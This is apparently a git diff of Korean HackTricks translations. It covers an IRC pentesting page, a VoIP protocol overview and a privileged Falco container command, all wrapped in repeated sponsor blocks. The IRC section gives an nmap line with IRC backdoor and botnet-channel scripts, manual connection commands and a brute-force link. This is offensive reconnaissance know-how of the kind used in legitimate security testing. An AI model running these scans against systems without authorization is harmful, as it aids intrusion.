docker run -it --privileged -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro falco
* Setting up /usr/src links from host
@ -338,13 +340,13 @@ falco-probe found and loaded in dkms
* [https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc](https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 기반으로 하는 검색 엔진으로, 회사나 그 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**당했는지 확인는 **무료** 기능을 제공합니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 기반으로 하는 검색 엔진으로, 회사나 그 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**당했는지 확인할 수 있는 **무료** 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보를 도난하는 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
WhiteIntel의 주요 목표는 정보를 도난하는 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격에 대항하는 것입니다.
그들의 웹사이트를 방문하여 **무료**로 엔진을 시도해 볼 수 있습니다:
@ -357,10 +359,10 @@ WhiteIntel의 주요 목표는 정보를 도난하는 악성 소프트웨어로
HackTricks를 지원하는 다른 방법:
* **HackTricks에서 귀하의 회사를 광고하거나 PDF로 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왹**](https://peass.creator-spring.com)을 구입하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 저희의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* 💬 [**디스코드 그룹**](https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**를 팔로우**하세요.
* **HackTricks****HackTricks Cloud** 깃허브 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
* **HackTricks에서 귀사를 광고하거나 PDF로 다운로드하려면** [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구매하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **💬 [디스코드 그룹](https://discord.gg/hRep4RUj7f)** 또는 [텔레그램 그룹](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**를 팔로우**하세요.
* **HackTricks 및 HackTricks Cloud** 깃허브 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
</details>

View file

@ -1,28 +1,28 @@
# 194,6667,6660-7000 - IRC Pentesting
# 194,6667,6660-7000 - IRC 펜테스팅
<details>
<summary><strong>AWS 해킹을 처음부터 전문가까지 배우세요</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong>를 통해 AWS 해킹을 제로부터 전문가로 배우세요!</summary>
HackTricks를 지원하는 다른 방법:
* **회사가 HackTricks에 광고되길 원하거나** **HackTricks를 PDF로 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 굿즈**](https://peass.creator-spring.com)를 구매하세요
* **회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드**하고 싶다면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구매하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **💬 [**Discord 그룹**](https://discord.gg/hRep4RUj7f)에 가입하거나 [**텔레그램 그룹**](https://t.me/peass)에 가입하거나** **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**팔로우하세요.**
* **해킹 트릭을 공유하려면 PR을** [**HackTricks**](https://github.com/carlospolop/hacktricks) **및** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **깃허브 저장소에 제출하세요.**
* **💬 [디스코드 그룹](https://discord.gg/hRep4RUj7f)** 또는 [텔레그램 그룹](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**팔로우**하세요.
* **HackTricks** 및 **HackTricks Cloud** 깃허브 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 기반으로 한 검색 엔진으로, 회사나 고객이 **스틸러 악성 코드**에 의해 **침해**당했는지 무료로 확인할 수 있는 기능을 제공합니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 고객이 **스틸러 악성 코드**에 의해 **침해**당했는지 무료로 확인할 수 있는 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보 도난 악성 코드로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 확인하고 **무료**로 엔진을 시도해 볼 수 있습니다:
그들의 웹사이트를 방문하여 엔진을 **무료로** 시험해 볼 수 있습니다:
{% embed url="https://whiteintel.io" %}
@ -34,7 +34,7 @@ IRC는 초기에 **일반 텍스트 프로토콜**이었으며 IANA에 의해 **
**닉네임**만 있으면 서버에 연결할 수 있습니다. 연결 후 서버는 사용자의 IP에 대한 역-DNS 조회를 수행합니다.
사용자는 **운영자**와 일반 **사용자**로 나뉘며, 운영자는 더 많은 액세스를 위해 **사용자 이름**과 **암호**가 필요합니다. 운영자는 다양한 권한을 가지며, 최고 관리자가 있습니다.
사용자는 **운영자**와 일반 **사용자**로 나뉘며, 운영자는 더 많은 액세스를 위해 **사용자 이름**과 **암호**가 필요합니다. 운영자는 다양한 권한을 가지며, 최고 관리자가 최상위에 위치합니다.
**기본 포트:** 194, 6667, 6660-7000
```
@ -52,7 +52,7 @@ openssl s_client -connect <IP>:<PORT> -quiet
```
### 매뉴얼
여기서는 **임의의 닉네임**을 사용하여 IRC에 연결하고 액세스하는 방법을 볼 수 있으며, 그런 다음 몇 가지 흥미로운 정보를 열람할 수 있습니다. IRC의 더 많은 명령어를 [여기](https://en.wikipedia.org/wiki/List\_of\_Internet\_Relay\_Chat\_commands#USERIP)에서 확인할 수 있습니다.
여기서는 **임의의 닉네임**을 사용하여 IRC에 연결하고 약간의 흥미로운 정보를 열람하는 방법을 볼 수 있습니다. IRC의 더 많은 명령어를 [여기](https://en.wikipedia.org/wiki/List\_of\_Internet\_Relay\_Chat\_commands#USERIP)에서 확인할 수 있습니다.
```bash
#Connection with random nickname
USER ran213eqdw123 0 * ran213eqdw123
@ -91,20 +91,34 @@ USER test1 test2 <IP> :test3
```bash
nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,6660-7000 <ip>
```
### [무차별 대입](../generic-methodologies-and-resources/brute-force.md#irc)
### [무차별 대입 공격](../generic-methodologies-and-resources/brute-force.md#irc)
### Shodan
* `호스트 이름 조회 중`
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 기반으로 한 검색 엔진으로, 회사나 그 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**당했는지 무료로 확인할 수 있는 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보를 도난당한 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 방문하여 엔진을 **무료**로 시험해 볼 수 있습니다:
그들의 웹사이트를 방문하여 엔진을 무료로 사용해 볼 수 있습니다:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>제로부터 AWS 해킹을 전문가로 배우세요</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks를 지원하는 다른 방법:
* **HackTricks에 귀사를 광고하거나 HackTricks를 PDF로 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 굿즈**](https://peass.creator-spring.com)를 구매하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 저희의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **💬 [디스코드 그룹](https://discord.gg/hRep4RUj7f)** 또는 [텔레그램 그룹](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**를 팔로우**하세요.
* **HackTricks 및 HackTricks Cloud** 깃허브 저장소에 PR을 제출하여 **해킹 요령을 공유**하세요.
</details>

View file

@ -7,22 +7,22 @@
HackTricks를 지원하는 다른 방법:
* **회사를 HackTricks에서 광고**하거나 **PDF로 HackTricks 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구하세요
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **💬 [Discord 그룹](https://discord.gg/hRep4RUj7f)** 또는 [텔레그램 그룹](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)을 **팔로우**하세요.
* **HackTricks****HackTricks Cloud** 깃허브 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
* **💬 [Discord 그룹](https://discord.gg/hRep4RUj7f)** 또는 [**텔레그램 그룹**](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)을 **팔로우**하세요.
* **HackTricks****HackTricks Cloud** 깃허브 저장소에 PR을 제출하여 **해킹 요령을 공유**하세요.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 기반으로 한 검색 엔진으로, 회사나 그 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**당했는지 무료로 확인할 수 있는 기능을 제공합니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**당했는지 무료로 확인할 수 있는 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보 도난 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 방문하여 엔진을 **무료로** 시도해 볼 수 있습니다:
그들의 웹사이트를 방문하고 엔진을 **무료로** 시험해 볼 수 있습니다:
{% embed url="https://whiteintel.io" %}
@ -40,81 +40,81 @@ WhiteIntel의 주요 목표는 정보 도난 악성 소프트웨어로 인한
### MGCP (미디어 게이트웨이 제어 프로토콜)
MGCP (미디어 게이트웨이 제어 프로토콜)는 RFC 3435에서 개요가 제공**시그널링** 및 **콜 제어 프로토콜**입니다. 이는 세 가지 주요 구성 요소로 구성된 중앙 집중형 아키텍처에서 작동합니다:
MGCP (미디어 게이트웨이 제어 프로토콜)는 RFC 3435에 기술**시그널링** 및 **콜 제어 프로토콜**입니다. 이는 세 가지 주요 구성 요소로 이루어진 중앙화 아키텍처에서 작동합니다:
1. **콜 에이전트 또는 미디어 게이트웨이 컨트롤러 (MGC)**: MGCP 아키텍처의 마스터 게이트웨이는 **미디어 게이트웨이를 관리하고 제어**하는 역할을 합니다. 콜 설정, 수정 및 종료 프로세스를 처리합니다. MGC는 MGCP 프로토콜을 사용하여 미디어 게이트웨이와 통신합니다.
2. **미디어 게이트웨이 (MGs) 또는 슬레이브 게이트웨이**: 이러한 장치는 서로 다른 네트워크 간의 디지털 미디어 스트림을 변환합니다. 예를 들어 전통적인 회로 교환 전화 및 패킷 교환 IP 네트워크입니다. 이들은 MGC에 의해 관리되며 그로부터 받은 명령을 실행합니다. 미디어 게이트웨이에는 트랜스코딩, 패킷화 및 에코 캔슬레이션과 같은 기능이 포함될 수 있습니다.
3. **시그널링 게이트웨이 (SGs)**: 이 게이트웨이는 서로 다른 네트워크 간의 시그널링 메시지를 변환하는 역할을 합니다. 전통적인 전화 시스템 (예: SS7)과 IP 기반 네트워크 (예: SIP 또는 H.323) 간의 원활한 통신을 가능하게 합니다. 시그널링 게이트웨이는 상호 운용성을 위해 중요하며 다른 네트워크 간에 콜 제어 정보가 올바르게 통신되도록 보장합니다.
1. **콜 에이전트 또는 미디어 게이트웨이 컨트롤러 (MGC)**: MGCP 아키텍처의 마스터 게이트웨이는 **미디어 게이트웨이를 관리하고 제어**합니다. 콜 설정, 수정 및 종료 프로세스를 처리합니다. MGC는 MGCP 프로토콜을 사용하여 미디어 게이트웨이와 통신합니다.
2. **미디어 게이트웨이 (MGs) 또는 슬레이브 게이트웨이**: 이러한 장치는 서로 다른 네트워크 간의 디지털 미디어 스트림을 변환합니다. 전통적인 회로 교환 전화 및 패킷 교환 IP 네트워크 사이. MGC에 의해 관리되며 그로부터 받은 명령을 실행합니다. 미디어 게이트웨이에는 트랜스코딩, 패킷화 및 에코 캔슬레이션과 같은 기능이 포함될 수 있습니다.
3. **시그널링 게이트웨이 (SGs)**: 이 게이트웨이는 서로 다른 네트워크 간의 시그널링 메시지를 변환하 전통적인 전화 시스템 (예: SS7)과 IP 기반 네트워크 (예: SIP 또는 H.323) 간의 원활한 통신을 가능하게 합니다. 시그널링 게이트웨이는 상호 운용성을 위해 중요하며 다른 네트워크 간에 콜 제어 정보가 올바르게 통신되도록 보장합니다.
요약하면, MGCP는 콜 제어 논리를 콜 에이전트에 중앙 집중화하여 미디어 및 시그널링 게이트웨이의 관리를 간소화하며 통신 네트워크에서 더 나은 확장성, 신뢰성 및 효율성을 제공합니다.
요약하면, MGCP는 콜 제어 논리를 콜 에이전트에 중앙화하여 미디어 및 시그널링 게이트웨이의 관리를 단순화하고 전화 통신 네트워크에서 더 나은 확장성, 신뢰성 및 효율성을 제공합니다.
### SCCP (스키니 클라이언트 제어 프로토콜)
스키니 클라이언트 제어 프로토콜 (SCCP)은 Cisco Systems 소유의 **전용 시그널링 및 콜 제어 프로토콜**입니다. 주로 Cisco Unified Communications Manager (이전에는 CallManager로 알려짐)와 Cisco IP 전화기 또는 다른 Cisco 음성 및 비디오 엔드포인트 간의 통신에 **사용**됩니다.
스키니 클라이언트 제어 프로토콜 (SCCP)은 Cisco Systems 소유의 **전용 시그널링 및 콜 제어 프로토콜**입니다. 주로 **Cisco Unified Communications Manager** (이전에는 CallManager로 알려짐)와 Cisco IP 전화기 또는 다른 Cisco 음성 및 비디오 엔드포인트 간의 통신에 **사용**됩니다.
SCCP는 콜 제어 서버와 엔드포인트 장치 간의 통신을 간소화하는 경량 프로토콜입니다. 다른 VoIP 프로토콜인 H.323 또는 SIP와 비교하여 대역폭 요구 사항이 줄어들어 더 효율적입니다.
SCCP는 콜 제어 서버와 엔드포인트 장치 간의 통신을 간소화하는 경량 프로토콜입니다. 그 이름이 "Skinny"로 불리는 이유는 다른 VoIP 프로토콜인 H.323 또는 SIP와 비교하여 최소한의 디자인과 줄어든 대역폭 요구 사항 때문입니다.
SCCP 기반 시스템의 주요 구성 요소는 다음과 같습니다:
1. **콜 제어 서버**: 일반적으로 Cisco Unified Communications Manager인 이 서버는 콜 설정, 수정 및 종료 프로세스를 관리하며 콜 포워딩, 콜 전달 및 콜 보류와 같은 다른 전화 기능을 처리합니다.
2. **SCCP 엔드포인트**: 이들은 IP 전화기, 비디오 회의 시스템 또는 다른 Cisco 음성 및 비디오 엔드포인트와 통신하기 위해 SCCP를 사용하는 장치입니다. 이들은 서버에 등록하고, 시그널링 메시지를 보내고 받으며, 콜 처리에 대한 서버의 지시를 따릅니다.
3. **게이트웨이**: 이러한 장치는 전통적인 회로 교환 전화 및 패킷 교환 IP 네트워크 간의 미디어 스트림을 변환하는 역할을 합니다. 트랜스코딩이나 에코 캔슬레이션과 같은 추가 기능을 포함할 수도 있습니다.
1. **콜 제어 서버**: 일반적으로 Cisco Unified Communications Manager로, 콜 설정, 수정 및 종료 프로세스를 관리하며 콜 포워딩, 콜 전달 및 콜 보류와 같은 다른 전화 기능을 처리합니다.
2. **SCCP 엔드포인트**: 이 IP 전화기, 비디오 회의 시스템 또는 다른 Cisco 음성 및 비디오 엔드포인트와 통신하기 위해 SCCP를 사용하는 장치입니다. 서버에 등록하고 시그널링 메시지를 보내고 받으며 콜 처리에 대한 서버에서 제공하는 지시를 따릅니다.
3. **게이트웨이**: 이러한 장치는 전통적인 회로 교환 전화 및 패킷 교환 IP 네트워크 사이에서 미디어 스트림을 변환하는 역할을 담당합니다. 트랜스코딩이나 에코 캔슬레이션과 같은 추가 기능을 포함할 수도 있습니다.
SCCP는 Cisco 콜 제어 서버와 엔드포인트 장치 간의 간단하고 효율적인 통신 방법을 제공합니다. 그러나 **SCCP는 전용 프로토콜**이므로 비-Cisco 시스템과의 상호 운용성이 제한될 수 있습니다. 이러한 경우에는 SIP와 같은 다른 표준 VoIP 프로토콜이 더 적합할 수 있습니다.
SCCP는 Cisco 콜 제어 서버와 엔드포인트 장치 간의 간단하고 효율적인 통신 방법을 제공합니다. 그러나 **SCCP는 전용 프로토콜**이므로 비-Cisco 시스템과의 상호 운용성을 제한할 수 있습니다. 이러한 경우에는 SIP와 같은 다른 표준 VoIP 프로토콜이 더 적합할 수 있습니다.
### H.323
H.323은 IP 기반 네트워크와 같은 패킷 교환 네트워크를 통해 음성, 비디오 및 데이터 회의를 포함한 멀티미디어 통신을 위한 **프로토콜 스위트**입니다. 국제 전기 통신 연합 (ITU-T)에서 개발되었으며 멀티미디어 통신 세션을 관리하기 위한 포괄적인 프레임워크를 제공합니다.
H.323은 IP 기반 네트워크와 같은 패킷 교환 네트워크를 통해 음성, 비디오 및 데이터 회의를 포함한 멀티미디어 통신을 위한 **프로토콜 스위트**입니다. 이는 **국제 전기 통신 연합** (ITU-T)에 의해 개발되었으며 멀티미디어 통신 세션을 관리하기 위한 포괄적인 프레임워크를 제공합니다.
H.323 스위트의 주요 구성 요소는 다음과 같습니다:
1. **단말기**: IP 전화기, 비디오 회의 시스템 또는 소프트웨어 응용 프로그램과 같은 엔드포인트 장치로, H.323를 지원하고 멀티미디어 통신 세션에 참여할 수 있습니다.
2. **게이트웨이**: 이러한 장치는 전통적인 회로 교환 전화 및 패킷 교환 IP 네트워크 간의 미디어 스트림을 변환하여 H.323와 다른 통신 시스템 간의 상호 운용성을 가능하게 합니다. 트랜스코딩이나 에코 캔슬레이션과 같은 추가 기능을 포함할 수도 있습니다.
3. **게이트키퍼**: 이들은 H.323 네트워크에서 콜 제어 및 관리 서비스를 제공하는 선택적 구성 요소입니다. 주소 변환, 대역폭 관리 및 입장 제어와 같은 기능을 수행하여 네트워크 자원을 관리하고 최적화하는 데 도움을 줍니다.
4. **다중 점 제어 장치 (MCU)**: 이들은 여러 엔드포인트에서 미디어 스트림을 관리하고 혼합하여 다중 점 회의를 용이하게 합니다. MCU는 비디오 레이아웃 제어, 음성 활성 전환 및 지속적인 존재와 같은 기능을 가능하게 하여 다수 참가자가 있는 대규모 회의를 주최할 수 있게 합니다.
2. **게이트웨이**: 이러한 장치는 전통적인 회로 교환 전화 및 패킷 교환 IP 네트워크 사이에서 미디어 스트림을 변환하여 H.323와 다른 통신 시스템 간의 상호 운용성을 가능하게 합니다. 트랜스코딩이나 에코 캔슬레이션과 같은 추가 기능을 포함할 수도 있습니다.
3. **게이트키퍼**: 이 H.323 네트워크에서 콜 제어 및 관리 서비스를 제공하는 선택적 구성 요소입니다. 주소 변환, 대역폭 관리 및 입장 제어와 같은 기능을 수행하여 네트워크 자원을 관리하고 최적화하는 데 도움을 줍니다.
4. **다중점 제어 장치 (MCU)**: 이러한 장치는 여러 엔드포인트에서 미디어 스트림을 관리하고 혼합하여 다중점 회의를 용이하게 합니다. MCU는 비디오 레이아웃 제어, 음성 활성 전환 및 지속적인 존재와 같은 기능을 가능하게 하여 다수 참가자가 있는 대규모 회의를 주최할 수 있게 합니다.
H.323는 다양한 오디오 및 비디오 코덱을 지원하며 콜 포워딩, 콜 전달, 콜 보류 및 콜 대기와 같은 다른 부가 서비스도 제공합니다. VoIP 초기에 널리 채택되었지만, H.323는 더 현대적이고 유연한 SIP와 같은 프로토콜에 점차 대체되었습니다. 그러나 H.323는 여전히 많은 레거시 시스템에서 사용되고 있으며 다양한 장비 공급 업체에서 지원을 계속하고 있습니다.
H.323는 다양한 오디오 및 비디오 코덱을 지원하며 콜 포워딩, 콜 전달, 콜 보류 및 콜 대기와 같은 다른 부가 서비스를 제공합니다. VoIP 초기에 널리 채택되었지만, H.323는 더 나은 상호 운용성과 쉬운 구현을 제공하는 **세션 초기화 프로토콜 (SIP)**와 같은 더 현대적이고 유연한 프로토콜에 점차 대체되었습니다. 그러나 H.323는 여전히 많은 레거시 시스템에서 사용되며 다양한 장비 공급 업체에 의해 지원되고 있습니다.
### IAX (인터 아스터리스크 익스체인지)
IAX (인터-아스터리스크 익스체인지)는 Asterisk PBX (사설 분기 교환) 서버와 다른 VoIP 장치 간의 통신에 주로 사용되는 **시그널링 및 콜 제어 프로토콜**입니다. Asterisk 오픈 소스 PBX 소프트웨어의 창시자 인 Mark Spencer가 SIP 및 H.323와 같은 다른 VoIP 프로토콜에 대한 대안으로 개발했습니다.
IAX (인터-아스터리스크 익스체인지)는 Asterisk PBX (사설 분기 교환) 서버와 다른 VoIP 장치 간의 통신에 주로 사용되는 **시그널링 및 콜 제어 프로토콜**입니다. 이는 Asterisk 오픈 소스 PBX 소프트웨어의 창시자 인 Mark Spencer에 의해 SIP 및 H.323와 같은 다른 VoIP 프로토콜의 대안으로 개발되었습니다.
IAX는 **단순성, 효율성 및 구현 용이성**으로 알려져 있습니다. IAX의 주요 기능은 다음과 같습니다:
1. **단일 UDP 포트**: IAX는 신호 및 미디어 트래픽을 위해 단일 UDP 포트 (4569)를 사용하며, 방화벽 및 NAT 트래버설을 간단화하여 다양한 네트워크 환경에서 배포하기 쉽게 합니다.
2. **이진 프로토콜**: SIP와 같은 텍스트 기반 프로토콜과 달리 IAX는 이진 프로토콜로, 대역폭 소비를 줄이고 신호 및 미디어 데이터를 전송하는 데 더 효율적입니다.
3. **트럭킹**: IAX는 여러 통화를 단일 네트워크 연결로 결합할 수 있는 트럭킹을 지원하여 오버헤드를 줄이고 대역폭 이용률을 향상시킵니다.
3. **트런킹**: IAX는 여러 통화를 단일 네트워크 연결로 결합할 수 있는 트런킹을 지원하여 오버헤드를 줄이고 대역폭 이용률을 향상시킵니다.
4. **네이티브 암호화**: IAX는 RSA를 키 교환 및 AES를 미디어 암호화에 사용하는 암호화를 내장하여 엔드포인트 간의 안전한 통신을 제공합니다.
5. **피어 투 피어 통신**: IAX는 중앙 서버 없이 엔드포인트 간 직접 통신에 사용될 수 있어, 더 간단하고 효율적인 콜 라우팅을 가능하게 합니다.
5. **피어 투 피어 통신**: IAX는 중앙 서버 없이 엔드포인트 간 직접 통신에 사용될 수 있어 더 간단하고 효율적인 콜 라우팅을 가능하게 합니다.
IAX는 Asterisk 생태계에 주로 초점을 맞추고 있으며, SIP 및 H.323와 같은 더 확립된 프로토콜에 비해 보급도가 낮습니다. 결과적으로 IAX는 비-Asterisk 시스템이나 장치와의 상호 운용성에 대한 최선의 선택이 아닐 수 있습니다. 그러나 Asterisk 환경에서 작업하는 경우, IAX는 VoIP 통신에 대한 견고하고 효율적인 솔루션을 제공합니다.
이점에도 불구하고 IAX는 Asterisk 생태계에 주로 초점을 맞추고 있으며 SIP와 같은 더 확립된 프로토콜과 비교하여 보다 적은 보급도를 가지고 있습니다. 결과적으로 IAX는 비-Asterisk 시스템이나 장치와의 상호 운용성에 대한 최선의 선택이 아닐 수 있습니다. 그러나 Asterisk 환경에서 작업하는 경우, IAX는 VoIP 통신에 대한 견고하고 효율적인 솔루션을 제공합니다.
## 전송 및 전송 프로토콜
### SDP (세션 설명 프로토콜)
SDP (Session Description Protocol)은 IP 네트워크 상에서 음성, 비디오 또는 데이터 회의와 같은 멀티미디어 세션의 특성을 설명하는 데 사용되는 **텍스트 기반 형식**입니다. **인터넷 공학 작업군 (IETF)**에 의해 개발되었으며 **RFC 4566**에서 정의되었습니다. SDP는 실제 미디어 전송이나 세션 설정을 처리하지 않지만 **SIP (세션 시작 프로토콜)**와 같은 다른 시그널링 프로토콜과 함께 사용되어 미디어 스트림 및 그 특성에 대한 정보를 협상하고 교환하는 데 사용됩니다.
SDP (Session Description Protocol)은 IP 네트워크 상에서 음성, 비디오 또는 데이터 회의와 같은 멀티미디어 세션의 특성을 설명하는 데 사용되는 **텍스트 기반 형식**입니다. **인터넷 공학 작업군 (IETF)**에 의해 개발되었으며 **RFC 4566**에서 정의되었습니다. SDP는 실제 미디어 전송이나 세션 설정을 처리하지 않지만 **SIP (세션 시작 프로토콜)**와 같은 다른 시그널링 프로토콜과 함께 사용되어 미디어 스트림 및 그 특성에 대한 협상 및 정보 교환에 사용됩니다.
SDP의 주요 요소는 다음과 같습니다:
1. **세션 정보**: SDP는 세션 이름, 세션 설명, 시작 시간 및 종료 시간을 포함한 멀티미디어 세션의 세부 정보를 설명합니다.
2. **미디어 스트림**: SDP는 미디어 스트림의 특성을 정의합니다. 예를 들어 미디어 유형 (오디오, 비디오 또는 텍스트), 전송 프로토콜 (예: RTP 또는 SRTP) 및 미디어 형식 (예: 코덱 정보)이 포함됩니다.
3. **연결 정보**: SDP는 미디어를 보낼 위치 또는 받을 위치의 네트워크 주소 (IP 주소) 및 포트 번호에 대한 정보를 제공합니다.
4. **속성**: SDP는 세션이나 미디어 스트림에 대한 추가적이고 선택적인 정보를 제공하기 위해 속성을 지원합니다. 속성은 암호화 키, 대역폭 요구 사항 또는 미디어 제어 메커니즘과 같은 다양한 기능을 지정하는 데 사용될 수 있습니다.
3. **연결 정보**: SDP는 미디어를 보낼 또는 받을 네트워크 주소 (IP 주소) 및 포트 번호에 대한 정보를 제공합니다.
4. **속성**: SDP는 세션 또는 미디어 스트림에 대한 추가적이고 선택적인 정보를 제공하기 위해 속성을 지원합니다. 속성은 암호화 키, 대역폭 요구 사항 또는 미디어 제어 메커니즘과 같은 다양한 기능을 지정하는 데 사용될 수 있습니다.
SDP는 일반적으로 다음과 같은 과정에서 사용됩니다:
SDP는 일반적으로 다음과 같은 프로세스에서 사용됩니다:
1. 시작하는 당사자가 제안된 멀티미디어 세션에 대한 SDP 설명을 작성하며, 미디어 스트림과 그 특성에 대한 세부 정보를 포함합니다.
2. SDP 설명이 수신 당사자에게 보내지며, 일반적으로 SIP 또는 RTSP와 같은 시그널링 프로토콜 메시지 내에 포함됩니다.
3. 수신 당사자는 SDP 설명을 처리하고, 자신의 기능에 따라 제안된 세션을 수락, 거부 또는 수정할 수 있습니다.
3. 수신 당사자는 SDP 설명을 처리하고, 기능에 따라 제안된 세션을 수락, 거부 또는 수정할 수 있습니다.
4. 최종 SDP 설명이 시그널링 프로토콜 메시지의 일부로 시작하는 당사자에게 다시 보내져 협상 프로세스가 완료됩니다.
SDP의 간단함과 유연성으로 인해 다양한 통신 시스템에서 멀티미디어 세션을 설명하는 데 널리 사용되는 표준이며, IP 네트워크 상에서 실시간 멀티미디어 세션을 설정하고 관리하는 데 중요한 역할을 합니다.
SDP의 간결성과 유연성으로 인해 다양한 통신 시스템에서 멀티미디어 세션을 설명하는 데 널리 사용되는 표준이며, IP 네트워크 상에서 실시간 멀티미디어 세션을 설정하고 관리하는 데 중요한 역할을 합니다.
### RTP / RTCP / SRTP / ZRTP
1. **RTP (실시간 전송 프로토콜)**: RTP는 오디오 및 비디오 데이터 또는 기타 실시간 미디어를 IP 네트워크 상에서 전달하기 위해 설계된 네트워크 프로토콜입니다. **IETF**에 의해 개발되었으며 **RFC 3550**에서 정의되었습니다. RTP는 주로 SIP 및 H.323와 같은 시그널링 프로토콜과 함께 사용되어 멀티미디어 통신을 가능하게 합니다. RTP는 미디어 스트림의 **동기화**, **순서화** 및 **타임스탬핑**을 위한 메커니즘을 제공하여 원활하고 시기적인 미디어 재생을 보장합니다.
